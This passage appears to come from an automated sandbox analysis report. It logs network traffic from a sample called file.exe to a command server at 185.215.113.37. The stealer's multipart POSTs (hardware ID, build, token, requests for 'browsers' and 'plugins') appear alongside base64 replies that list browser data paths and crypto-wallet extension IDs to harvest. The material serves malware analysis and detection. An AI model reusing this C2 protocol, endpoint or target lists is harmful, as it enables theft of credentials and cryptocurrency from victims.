Oct 10, 2024 18:23:21.293920994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293927908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293927908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293934107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293951988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293962955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293962955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.293971062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293982983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.293998957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.294012070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.294025898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.294025898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.294028997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.294073105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.294074059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.294074059 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.294157028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.382715940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.382771969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.975430965 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.975503922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:21.980422020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:21.980501890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:22.854660988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:22.860780954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.121854067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.126734972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:23.345200062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:23.345216036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:23.345237017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:23.345321894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.345321894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.347745895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.352826118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:23.573040962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:23.573100090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.586024046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:23.590995073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.303931952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.304038048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:24.340039015 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:24.345532894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.579241037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.579256058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.579276085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.579288960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.579348087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:24.579348087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:24.669905901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:24.672528982 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:24.673101902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:24.678000927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:25.392823935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:25.396845102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:30.340513945 CEST	49731	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	185.215.113.37	80	2484	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 18:23:07.920428038 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 10, 2024 18:23:08.631506920 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 10, 2024 18:23:08.659864902 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAK Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 33 35 44 42 46 32 45 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="hwid"2AA35DBF2EE41866486636------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build"doma------EGDBFIIECBGDGDGDHCAK--
Oct 10, 2024 18:23:08.897592068 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:08 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 44 41 34 4e 6a 52 6c 4d 54 55 79 5a 44 55 33 5a 47 4d 30 4d 54 6c 6d 4d 57 51 31 4e 32 51 77 4d 7a 67 35 5a 47 55 78 4d 6a 41 35 4e 7a 59 30 59 6a 41 32 4d 6a 63 30 59 6a 55 33 5a 44 55 35 59 6a 5a 69 5a 6d 55 79 59 54 51 33 4f 54 41 77 4e 7a 52 68 59 54 42 6b 4e 44 67 34 4d 44 55 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MDA4NjRlMTUyZDU3ZGM0MTlmMWQ1N2QwMzg5ZGUxMjA5NzY0YjA2Mjc0YjU3ZDU5YjZiZmUyYTQ3OTAwNzRhYTBkNDg4MDU2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 10, 2024 18:23:08.898857117 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBG Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="message"browsers------FHCGHJDBFIIDGDHIJDBG--
Oct 10, 2024 18:23:09.126895905 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 10, 2024 18:23:09.126914978 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 10, 2024 18:23:09.127990961 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="message"plugins------AAEBAFBGIDHCBFHIECFC--
Oct 10, 2024 18:23:09.351902962 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 10, 2024 18:23:09.352044106 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 10, 2024 18:23:09.352061033 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 10, 2024 18:23:09.352197886 CEST	372	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 10, 2024 18:23:09.352214098 CEST	1236	IN	Data Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
Oct 10, 2024 18:23:09.352229118 CEST	1236	IN	Data Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5
Oct 10, 2024 18:23:09.352243900 CEST	792	IN	Data Raw: 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 Data Ascii: bGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21
Oct 10, 2024 18:23:09.353522062 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"fplugins------GIJKKKFCFHCFIECBGDHI--
Oct 10, 2024 18:23:09.577011108 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 10 Oct 2024 16:23:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 10, 2024 18:23:09.593193054 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKF Host: 185.215.113.37 Content-Length: 5571 Connection: Keep-Alive Cache-Control: no-cache
